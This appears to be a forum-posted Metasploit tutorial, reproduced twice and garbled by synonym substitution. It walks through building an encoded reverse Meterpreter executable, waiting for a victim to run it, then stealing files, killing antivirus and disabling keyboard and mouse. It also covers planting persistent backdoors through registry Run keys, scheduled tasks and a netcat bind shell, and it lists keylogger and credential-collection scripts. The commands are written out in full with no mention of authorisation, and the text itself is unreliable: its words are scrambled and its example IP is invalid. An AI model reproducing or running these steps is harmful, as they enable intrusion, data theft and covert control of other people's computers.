I innovate my tutorial on the Metasploit Framework. This applys to both Linux too Windows.
Although, I would seriously advise using Metasploit inside Linux, specifically
'Backtrack 4 - PreRelease' (The Latest)
If you lot dont know what the metasploit framework is, too hence hold off it up. You've been missing out.In no mode is this meant to hold out a comprehensive guide. MSF is HUGE. Too many things tin hold out done amongst it,
you could write xv books on it. MSF is Open Source too coded inwards the Ruby language.
Get used to the 'help' option!
PAYLOADs
========
I'm gonna starting fourth dimension amongst Payloads, many people know already that MSF is an exploitation framework, equally inwards you lot can
work out vulnerabilities inwards software, too role the framework to apace do working exploits for it.
There's hundreds of payloads that you lot tin conduct from, hence that when you lot exploit the arrangement inwards question
you tin easily automate the execution of a payload of your alternative on the machine.
I volition demo you lot how to plough those payloads into an actual .EXE hence it volition only run equally is.
Ok. Lets begin:
Fire upwards your MSF, brand certain it's updated, equally they are constantly making amendments to this.
For backtrack i hollo back its : cd pentest/exploits/framework3
Metasploit Double Encoded Reverse Meterpreter Payload
================================================== ===
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=123.234.456.678 LPORT=82 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /meterpreter_reverse.exe
LHOST - is our machine (listening host, equally nosotros are waiting for a connective from RHOST (remote host)
LPORT - self explanitory. Just brand certain you lot accept port forwarding laid on your router ofcourse.
Meterpreter - An incredibly advanced rhythm out which sort of simulates bash. (even on a win system) - lots of power.
You'll run across how much ability shorty.
Now you lot accept your PAYLOAD.exe
Metasploit Listener
===================
In /framework3 directory
$ ./msfconsole
(Takes a lil infinitesimal for this to load)
use exploit/multi/handler (Sets the exploit to a handler)
set PAYLOAD windows/meterpreter/reverse_tcp (Most mutual Payload to use, endeavor experimenting amongst others)
set LHOST 192.162.1.50 (Make certain you lot laid LHOST to your address on Network too non localhost)
set LPORT 82 (Sometimes, port 80, 443 or 8080 is ameliorate equally to around FW's it looks less suspicious)
set ExitOnSession imitation (As shortly equally you lot larn a session, it doesn't automatically jump inwards to it)
set AutoRunScript /killav.rb (when client connects back, too meterpreter payload is uploaded, killav.rb script is uploaded too executed)
exploit -j (sets exploit upwards equally a job, practiced for shells on multiple customers)
(See to a greater extent than on scripts... downwards )
Continuation
============
When all goes well, too you lot accept hitting 'exploit -j' too accept waited for a client to click on the payload.exe you lot created earlier
you volition run across materials happening inwards the screen. You volition detect it run the killab script, too hence says something similar :
* Meterpreter session 1 opened (123.234.345.567:63456 -> 192.168.1.50:82)
Ok, here's the basics:
type :
sessions -l (this lists whatever sessions nosotros accept i.e. customers. Notice the lowercase L )
sessions -i 1 (this is to interact amongst the session 1. i.e. Interect. Lowercase I)
If you lot demand to come upwards out of this screen. Either CTRL+Z or type 'background' without the ''
Ok.. So nosotros are inwards the session: Brilliant
Continuation - The Good Stuff
=============================
$ Meterpreter > getuid (this volition demo you lot currently logged inwards user)
$ Meterpreter > idletime (wanna run across how long user has afk?)
$ Meterpreter > assist (this volition demo you lot a massive listing of amzing commands to use!)
$ Meterpreter > role priv (then cheque assist again, to a greater extent than privilidged commands straight off eh?
ok i volition demo around actually handy ones
$ Meterpreter > upload evil.exe evil.exe (uploads the file from this machine over to the customer)
$ Meterpreter > download secret.txt secret.txt (downloads the txt file to our machine)
$ Meterpreter > cd "Documents too settings" (cd's to a folder amongst spaces inwards it.)
$ Meterpreter > ls (this is an illustration of the bash type commands nosotros accept on the target win machine, version of dir)
$ Meterpreter > download -r “My Documents” /home/root/Documents (This would download the entire "My Docs" folder over to us.
$ Meterpreter > execute *f evil.exe (executed the file on the customer)
$ Meterpreter > execute *f cmd.exe *c *H *i (-f executes, cmd.exe rhythm out on target, channelized, hidden, interactive)
(customer volition non run across a affair your doing equally all the options are laid properly)
Check downwards the bottom for around useful cmd.exe commands that are really useful
$ Meterpreter > uictl disable keyboard (disables around user interface componants)
$ Meterpreter > uictl disable mouse
$ Meterpreter > uictl enable keyboard (enables)
$ Meterpreter > ps (this volition demo you lot a detailed listing of all processes running on target machine)
$ Meterpreter > migrate pid (migrates/injects itself into around other procedure id) e.g migrate 716 (explorer.exe)
$ Meterpreter > kill pid (kills process) e.g. kill 563 (av.exe goes down)
etc etc etc etc....
Using Payload As H5N1 Backdoor
===========================
upload /home/metabkdr.exe metabkdr.exe (to app information directory)
execute *-f cmd.exe *-c *-H -*i
Way 1 :
cmd.exe > REG add together HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "C:\Documents too Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /f
(This adds a registry startup obviously)
Way 2 :
cmd.exe > at 19:00 /every:M,T,W,Th,F cmd /c starting fourth dimension "C:\Documents too Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe"
(runs backdoor at 7pm all weekdays, at ascendence works for all windows i think)
way iii :
cmd.exe > SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45
/TN FIREWALL /TR "C:\Documents too Settings\Owner\Application Data\Microsoft\Ins
taller\metabkdr.exe" /ED 11/11/2011
(This runs the backdoor every 45 mins equally SYSTEM (on XP. XP abode doesnt accept schtask, has 'at' though)
Plant H5N1 Simple Backdoor amongst Netcat
===================================
plant a backdoor
A really uncomplicated mode of planting backdoor could hold out using netcat.
steps:
1. upload a netcat executable (nc.exe) on remote machine.
meterpreter provides a ascendence 'upload' for that
2. c:\windows\system32 > nc.exe -l -L -p <port number> -e cmd.exe
3. straight off from your machine, type nc -v -n <ip address> <port>
It volition give you lot a ascendence rhythm out of remote machine
nc -l -d -p fourscore -e c:\windows\system32\cmd.exe
More On Scripts:
================
Scripts tin hold out run from the meterpreter rhythm out when you lot accept a rhythm out on a customer.
All you lot do is: (where '$' is non to hold out typed. This is the bash shell)
$ run scraper -h (This volition demo you lot the options etc for whatever of the scripts)
or
$ run keylogrecorder -h
The Sky is your limit when it comes to scripts. You tin code them to do all sorts of materials for you.
There are many already inside the the framework, made past times folk.. here's a pocket-size listing of around already there:
killav.rb (kills all anti viruses running on system)
getcountermeasure.rb (kills av's too fw's/ids')
scraper.rb (logs LOADS of useful information via a serious of automated commands on customer. Logs stored inwards /root/.msf3/
gettelnet.rb (able to opened upwards a telnet server on the client amongst a username too password)
checkvm.rb (checks to run across if it is a VM. And version numbers)
netenum.rb
search_dwld.rb
winbf.rb
credcollect.rb
hostsedit.rb
remotewinenum.rb
keylogrecorder.rb
scheduleme.rb
winenum.rb
getgui.rb
schtasksabuse.rb
wmic.rb
get_local_subnets.rb
migrate.rb
Credits: backtrack forums / metasploit /irongeek
Reply With Quote
Although, I would seriously advise using Metasploit inside Linux, specifically
'Backtrack 4 - PreRelease' (The Latest)
If you lot dont know what the metasploit framework is, too hence hold off it up. You've been missing out.In no mode is this meant to hold out a comprehensive guide. MSF is HUGE. Too many things tin hold out done amongst it,
you could write xv books on it. MSF is Open Source too coded inwards the Ruby language.
Get used to the 'help' option!
PAYLOADs
========
I'm gonna starting fourth dimension amongst Payloads, many people know already that MSF is an exploitation framework, equally inwards you lot can
work out vulnerabilities inwards software, too role the framework to apace do working exploits for it.
There's hundreds of payloads that you lot tin conduct from, hence that when you lot exploit the arrangement inwards question
you tin easily automate the execution of a payload of your alternative on the machine.
I volition demo you lot how to plough those payloads into an actual .EXE hence it volition only run equally is.
Ok. Lets begin:
Fire upwards your MSF, brand certain it's updated, equally they are constantly making amendments to this.
For backtrack i hollo back its : cd pentest/exploits/framework3
Metasploit Double Encoded Reverse Meterpreter Payload
================================================== ===
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=123.234.456.678 LPORT=82 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /meterpreter_reverse.exe
LHOST - is our machine (listening host, equally nosotros are waiting for a connective from RHOST (remote host)
LPORT - self explanitory. Just brand certain you lot accept port forwarding laid on your router ofcourse.
Meterpreter - An incredibly advanced rhythm out which sort of simulates bash. (even on a win system) - lots of power.
You'll run across how much ability shorty.
Now you lot accept your PAYLOAD.exe
Metasploit Listener
===================
In /framework3 directory
$ ./msfconsole
(Takes a lil infinitesimal for this to load)
use exploit/multi/handler (Sets the exploit to a handler)
set PAYLOAD windows/meterpreter/reverse_tcp (Most mutual Payload to use, endeavor experimenting amongst others)
set LHOST 192.162.1.50 (Make certain you lot laid LHOST to your address on Network too non localhost)
set LPORT 82 (Sometimes, port 80, 443 or 8080 is ameliorate equally to around FW's it looks less suspicious)
set ExitOnSession imitation (As shortly equally you lot larn a session, it doesn't automatically jump inwards to it)
set AutoRunScript /killav.rb (when client connects back, too meterpreter payload is uploaded, killav.rb script is uploaded too executed)
exploit -j (sets exploit upwards equally a job, practiced for shells on multiple customers)
(See to a greater extent than on scripts... downwards )
Continuation
============
When all goes well, too you lot accept hitting 'exploit -j' too accept waited for a client to click on the payload.exe you lot created earlier
you volition run across materials happening inwards the screen. You volition detect it run the killab script, too hence says something similar :
* Meterpreter session 1 opened (123.234.345.567:63456 -> 192.168.1.50:82)
Ok, here's the basics:
type :
sessions -l (this lists whatever sessions nosotros accept i.e. customers. Notice the lowercase L )
sessions -i 1 (this is to interact amongst the session 1. i.e. Interect. Lowercase I)
If you lot demand to come upwards out of this screen. Either CTRL+Z or type 'background' without the ''
Ok.. So nosotros are inwards the session: Brilliant
Continuation - The Good Stuff
=============================
$ Meterpreter > getuid (this volition demo you lot currently logged inwards user)
$ Meterpreter > idletime (wanna run across how long user has afk?)
$ Meterpreter > assist (this volition demo you lot a massive listing of amzing commands to use!)
$ Meterpreter > role priv (then cheque assist again, to a greater extent than privilidged commands straight off eh?
ok i volition demo around actually handy ones
$ Meterpreter > upload evil.exe evil.exe (uploads the file from this machine over to the customer)
$ Meterpreter > download secret.txt secret.txt (downloads the txt file to our machine)
$ Meterpreter > cd "Documents too settings" (cd's to a folder amongst spaces inwards it.)
$ Meterpreter > ls (this is an illustration of the bash type commands nosotros accept on the target win machine, version of dir)
$ Meterpreter > download -r “My Documents” /home/root/Documents (This would download the entire "My Docs" folder over to us.
$ Meterpreter > execute *f evil.exe (executed the file on the customer)
$ Meterpreter > execute *f cmd.exe *c *H *i (-f executes, cmd.exe rhythm out on target, channelized, hidden, interactive)
(customer volition non run across a affair your doing equally all the options are laid properly)
Check downwards the bottom for around useful cmd.exe commands that are really useful
$ Meterpreter > uictl disable keyboard (disables around user interface componants)
$ Meterpreter > uictl disable mouse
$ Meterpreter > uictl enable keyboard (enables)
$ Meterpreter > ps (this volition demo you lot a detailed listing of all processes running on target machine)
$ Meterpreter > migrate pid (migrates/injects itself into around other procedure id) e.g migrate 716 (explorer.exe)
$ Meterpreter > kill pid (kills process) e.g. kill 563 (av.exe goes down)
etc etc etc etc....
Using Payload As H5N1 Backdoor
===========================
upload /home/metabkdr.exe metabkdr.exe (to app information directory)
execute *-f cmd.exe *-c *-H -*i
Way 1 :
cmd.exe > REG add together HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "C:\Documents too Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /f
(This adds a registry startup obviously)
Way 2 :
cmd.exe > at 19:00 /every:M,T,W,Th,F cmd /c starting fourth dimension "C:\Documents too Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe"
(runs backdoor at 7pm all weekdays, at ascendence works for all windows i think)
way iii :
cmd.exe > SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45
/TN FIREWALL /TR "C:\Documents too Settings\Owner\Application Data\Microsoft\Ins
taller\metabkdr.exe" /ED 11/11/2011
(This runs the backdoor every 45 mins equally SYSTEM (on XP. XP abode doesnt accept schtask, has 'at' though)
Plant H5N1 Simple Backdoor amongst Netcat
===================================
plant a backdoor
A really uncomplicated mode of planting backdoor could hold out using netcat.
steps:
1. upload a netcat executable (nc.exe) on remote machine.
meterpreter provides a ascendence 'upload' for that
2. c:\windows\system32 > nc.exe -l -L -p <port number> -e cmd.exe
3. straight off from your machine, type nc -v -n <ip address> <port>
It volition give you lot a ascendence rhythm out of remote machine
nc -l -d -p fourscore -e c:\windows\system32\cmd.exe
More On Scripts:
================
Scripts tin hold out run from the meterpreter rhythm out when you lot accept a rhythm out on a customer.
All you lot do is: (where '$' is non to hold out typed. This is the bash shell)
$ run scraper -h (This volition demo you lot the options etc for whatever of the scripts)
or
$ run keylogrecorder -h
The Sky is your limit when it comes to scripts. You tin code them to do all sorts of materials for you.
There are many already inside the the framework, made past times folk.. here's a pocket-size listing of around already there:
killav.rb (kills all anti viruses running on system)
getcountermeasure.rb (kills av's too fw's/ids')
scraper.rb (logs LOADS of useful information via a serious of automated commands on customer. Logs stored inwards /root/.msf3/
gettelnet.rb (able to opened upwards a telnet server on the client amongst a username too password)
checkvm.rb (checks to run across if it is a VM. And version numbers)
netenum.rb
search_dwld.rb
winbf.rb
credcollect.rb
hostsedit.rb
remotewinenum.rb
keylogrecorder.rb
scheduleme.rb
winenum.rb
getgui.rb
schtasksabuse.rb
wmic.rb
get_local_subnets.rb
migrate.rb
Credits: backtrack forums / metasploit /irongeek
Reply With Quote